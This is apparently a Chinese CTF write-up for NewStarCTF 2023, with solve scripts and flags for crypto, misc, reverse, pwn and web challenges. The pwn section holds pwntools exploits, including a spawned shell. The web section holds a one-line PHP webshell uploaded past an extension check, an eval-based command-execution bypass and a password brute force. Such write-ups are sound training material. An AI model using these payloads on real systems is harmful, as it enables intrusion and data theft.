Crypto

Caesar’s Secert

img

flag

flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

img

flag

flag{reordering_the_plaintext#686f8c03}

brainfuck

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
def shrinkBFCode(code):
cPos2Vars = {} #位置对应的变量
cPos2Change = {} #位置中 + 号 增加的值
varPos = 0
nCode = []
incVal = 0
lc = None
dataChangeOp = set(['+', '-'])
dataShiftOp = set(['>', '<'])
for i in range(len(code)):
c = code[i]
if c not in dataChangeOp and lc in dataChangeOp:
cPos2Change[len(nCode)] = incVal
cPos2Vars[len(nCode)] = varPos
nCode.append('+')
incVal = 0
if c == '>':
varPos += 1
elif c == '<':
varPos -= 1
else:
if c in dataChangeOp:
incVal += 1 if c == '+' else -1
else:
#if lc == '>' or lc == '<':
# cPos2Vars[len(nCode)] = varPos
cPos2Vars[len(nCode)] = varPos
nCode.append(c)
lc = c

return ''.join(nCode), cPos2Vars, cPos2Change

def generatePyCode(shellCode, pVars, pChange):
pyCodes = []
bStacks = []
whileVarCache = {}
for i, c in enumerate(shellCode):
d_pos = i if i not in pVars else pVars[i]
d_change = 1 if i not in pChange else pChange[i]
indentLevel = len(bStacks)
indentStr = ' '*(4*indentLevel)
if c == '[':
pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
bStacks.append((c, i))
whileVarCache[i] = {}
elif c == ']':
if bStacks[-1][0] != '[':
raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
cNum = i-bStacks[-1][1]
if cNum == 2:
del pyCodes[-1]
del pyCodes[-1]
d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
whileCode = shellCode[bStacks[-1][1]+1 : i]
if cNum>2 and '[' not in whileCode and not '%' in whileCode: # nested loop is a bit complicated, just skip
loopCondvar = bStacks[-1][1]
d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
whileVars = whileVarCache[bStacks[-1][1]]
cVarChange = whileVars[d_pos_l]
# remove statement of same indent
while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':
pyCodes.pop()
pyCodes.pop()
#del pyCodes[bStacks[-1][1]-i:]
for vPos, vChange in whileVars.items():
if vPos == d_pos_l:
continue
ctimes = abs(vChange / cVarChange)
ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
cSign = '+' if vChange > 0 else '-'
pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)),
vPos, cSign, ctimesStr, d_pos_l))
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
del whileVarCache[bStacks[-1][1]]
bStacks.pop()
elif c == '.':
pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
elif c == ',':
pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
elif c == '+':
opSign = '-=' if d_change < 0 else '+='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] += d_change
elif c == '-':
opSign = '+=' if d_change < 0 else '-='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] -= d_change
elif c == '%':
pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
return '\n'.join(pyCodes)

shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
print(generatePyCode(shrinkCode, pVars, pChange))

解密得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])

简单修改一下输出得到
img
或者CTF在线工具
img

flag

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Vigenère

Vigenere Solver
img

flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
phi_n = 1
for i in fac:
phi_n *= (i-1)
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
print(binascii.unhexlify(hex(m)[2:]))
#flag{us4_s1ge_t0_cal_phI}

flag

flag{us4_s1ge_t0_cal_phI}

babyxor

1
2
3
4
5
6
7
8
9
10
11
12
enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = [int(enc[i:i+2],16) for i in range(0, len(enc), 2)]
#print(cipher_hex)
for key in range(255):
flag = ''
for c in cipher_hex:
flag += chr(c ^ key)
#print(flag)
if 'flag' in flag:
print(f'key={key}\n{flag}')
break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}

flag

flag{x0r_15_symm3try_and_e4zy!!!!!!}

small d

n,e都很大,直接考虑维纳攻击
github上找个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import gmpy2
import libnum

def continuedFra(x, y):
"""计算连分数
:param x: 分子
:param y: 分母
:return: 连分数列表
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""计算传入列表最后的渐进分数
:param cf: 连分数列表
:return: 该列表最后的渐近分数
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# 这里的渐进分数分子分母要分开
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
:param a:x^2的系数
:param b:x的系数
:param c:pq
:return:p,q
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""计算列表所有的渐近分数
:param cf: 连分数列表
:return: 该列表所有的渐近分数
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf


def wienerAttack(e, n):
"""
:param e:
:param n:
:return: 私钥d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d

n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
#flag{learn_some_continued_fraction_technique#dc16885c}

flag

flag{learn_some_continued_fraction_technique#dc16885c}

babyencoding

1
2
3
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
img

flag

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

Affine

仿射密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)


def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m

modulus = 256
enc = bytes.fromhex(
'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)
for key_0 in range(256):

try:
inv_key_0 = modinv(key_0, modulus)
except:
continue

for key_1 in range(256):
decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
if b'flag{'in decrypted:
print("Key found:", key_0, key_1)
print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'

flag

flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


def pad(data):
return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])


def main():
flag_ = pad(flag)
key = os.urandom(16) * 2
iv = os.urandom(16)
print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
aes = AES.new(key, AES.MODE_CBC, iv)
enc_flag = aes.encrypt(flag_)
print(enc_flag)


if __name__ == "__main__":
main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

搓个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from Crypto.Cipher import AES
from Crypto.Util.number import *

a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
a = a ^ 1
#print(a)
print(long_to_bytes(a))
#_a = b'\x08 \x16 \x11 % \xa0 \xa6 \xc5 \xcb ^ \x02 \x99 N F ` \xea , \xeb L \x08 b \xc1 \x98 \xc2 \x07 \x8f \xa3 \xc1 O % q \xfc , '
key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
key = bytes_to_long(key)
iv = key ^ a
print(long_to_bytes(iv))

key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
iv = b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xebL\x08b\xc1\x98\xc2\x07\x8f\xa3\xc1O%q\xfc,'
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'

flag

flag{firsT_cry_Aes}

Misc

CyberChef’s Secret

img

flag

flag{Base_15_S0_Easy_^_^}

空白格

whitespace
img

flag

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

机密图片

扫码的结果不对,应该有隐写
运用工具StegSolver
img
img

flag

flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

隐秘的眼睛

SilentEye直接梭
img

flag

flag{R0ck1ng_y0u_63b0dc13a591}

流量!鲨鱼!

wireshark打开,大略看一下http,200 OK包很可疑
img
img
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
img

flag

flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

修复文件头,修复成功后后缀名改成.zip解压
img
flag.zip提示损坏
img
继续修复
img
或者你如果是高贵的bandizip pro用户
img
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
img
应该是提示flag.zip的解压密码是六位数字,密码232311
img

flag

flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

Reverse

easy_RE

img
img

flag

flag{welc0me_to_rev3rse!!}

Segments

shift+F7
img
手动过滤一下,修改格式得到flag

flag

flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

upx -d 脱壳
img

exp

1
2
3
4
5
enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
flag = ''
for i in enc:
flag += chr(ord(i) - 1)
print(flag)

flag

flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

ELF

encode加密完标准base64
img
img
先把密文base64解码成hex
img

exp

1
2
3
4
5
6
7
8
enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f, 
0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51,
0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
flag = ''
for i in enc:
flag += chr(i - 16 ^ 0x20)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}

flag

flag{D0_4ou_7now_wha7_ELF_1s?}

AndroXor

jadx打开,循环异或
img

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]
flag = ""
for i, value in enumerate(enc):
key_value = key_ascii[i % len(key_ascii)]
if isinstance(value, int):
xor_result = value ^ key_value
elif isinstance(value, str):
xor_result = ord(value) ^ key_value
flag += chr(xor_result)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}

flag

flag{3z_And0r1d_X0r_x1x1}

Endian

还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
img
shift+E提取出array
img

exp

1
2
3
4
5
6
7
8
9
10
11
enc = [
0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22,
0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73,
0x05]
key = [0x78,0x56,0x34,0x12]
flag = ''
for i, value in enumerate(enc):
key_value = key[i % len(key)]
flag += chr(value ^ key_value)
print(flag)
#flag{llittl_Endian_a}

flag

flag{llittl_Endian_a}

lazy_activity

非预期

img

正常解法

jadx打开有个flagactivity进程应该是点10000次出flag
img
打开模拟器app内提示’Where is my flag? Try to start another Activity.’
那就利用模拟器的adb工具

1
2
3
adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity

img
模拟器弹出这个界面
img
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本

1
2
3
4
5
6
7
8
9
10
import pyautogui as pd
import time
pd.FAILSAFE = True

time.sleep(3)
#3秒时间自己移动到要点击的位置
pd.click(clicks=100000,interval=0.0001)
# pyautogui.click()
# (100,100, clicks=2,interval=0.5,button=‘right’,duration=0.2)
# 位置,点击次数,间隔时间,右键(默认左键),移动间隔

img

flag

flag{Act1v1ty_!s_so00oo0o_Impor#an#}

EzPE

打不开,头文件被修改了
img
随便找个exe文件复制过来fix一下
img
简单的异或
img

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
enc = [
0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
flag = ''
l = len(enc)-2
for i in range(l,-1,-1):
enc[i] ^= (i ^ enc[i+1])
for i in enc:
flag += chr(i)
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

flag

flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

PWN

ret2text

栈溢出

exp

1
2
3
4
5
6
7
from pwn import *
p=remote("node4.buuoj.cn",25617)
elf = ELF ('./ret2text')
backdoor = elf.symbols['backdoor']
payload = b'a'*40+p64(backdoor)
p.sendline(payload)
p.interactive()

newstar_shop

看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don’t choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
img

ezshellcode

有个read
img
看看buf
img
直接传’\x90’ 全nop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

sh = shellcraft.sh()
payload = b'\x90'*(0x8+8) + asm(sh)
io.send(payload)
io.interactive()

img

random

有个随机数,直接调用
img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
io.sendlineafter("number?\n",str(clibc.rand()))
io.interactive()

pieee

PIE保护
img
看看buf在栈中位置
img
传完buf 0x28个后直接跳到0x6c
img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

banary = "./pie"

elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

payload = b'a'*(0x28)+b'\x6c'
io.send(payload)
io.interactive()

img

web

ErrorFlask

随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
img

flag

flag{Y0u_@re_3enset1ve_4bout_deb8g}

Begin of HTTP

提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
img
提示用post 传 secret
img
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
img
post 传一下
img
改一下cookie,改成ctfer
img
改 User-Agent 为 NewStarCTF2023
img
改Referer为 newstarctf.com
img
最后改一下请求头

text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d

img

泄露的秘密

找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txtindex.php

1
PART ONE: flag{r0bots_1s_s0_us3ful
1
2
3
<?php
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";

flag

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

前端有文件后缀名检测
img
直接在包中修改后缀名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png

<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"

Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--

传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
img

flag

flag{32ae814a-7562-460c-a936-e6b88ed93f8f}

Begin of PHP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
echo "=Level 1=<br>";
if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
$flag1 = True;
}else{
die("nope,this is level 1");
}
}

if($flag1){
echo "=Level 2=<br>";
if(isset($_POST['key3'])){
if(md5($_POST['key3']) === sha1($_POST['key3'])){
$flag2 = True;
}
}else{
die("nope,this is level 2");
}
}

if($flag2){
echo "=Level 3=<br>";
if(isset($_GET['key4'])){
if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
$flag3 = True;
}else{
die("nope,this is level 3");
}
}
}

if($flag3){
echo "=Level 4=<br>";
if(isset($_GET['key5'])){
if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
$flag4 = True;
}else{
die("nope,this is level 4");
}
}
}

if($flag4){
echo "=Level 5=<br>";
extract($_POST);
foreach($_POST as $var){
if(preg_match("/[a-zA-Z0-9]/",$var)){
die("nope,this is level 5");
}
}
if($flag5){
echo file_get_contents("/flag");
}else{
die("nope,this is level 5");
}
}

get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
img

R!C!E!

1
2
3
4
5
6
7
8
9
10
11
<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
$password=md5($_POST['password']);
$code=$_POST['e_v.a.l'];
if(substr($password,0,6)==="c4d038"){
if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
eval($code);
}
}
}

爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img

EasyLogin

密码应该是个md5
img
随便注册个用户看看
img
登录成功后看看源代码可以肯定是md5
img
是个弱口令
img
尝试爆破admin
img
发送到intruder
payload位置选择pwd
img
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
img
有个8360的不一样,应该就是爆破成功的,把pw复制一下
img
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
img
img
修改完pw后一直点放行,抓到含flag的response包
img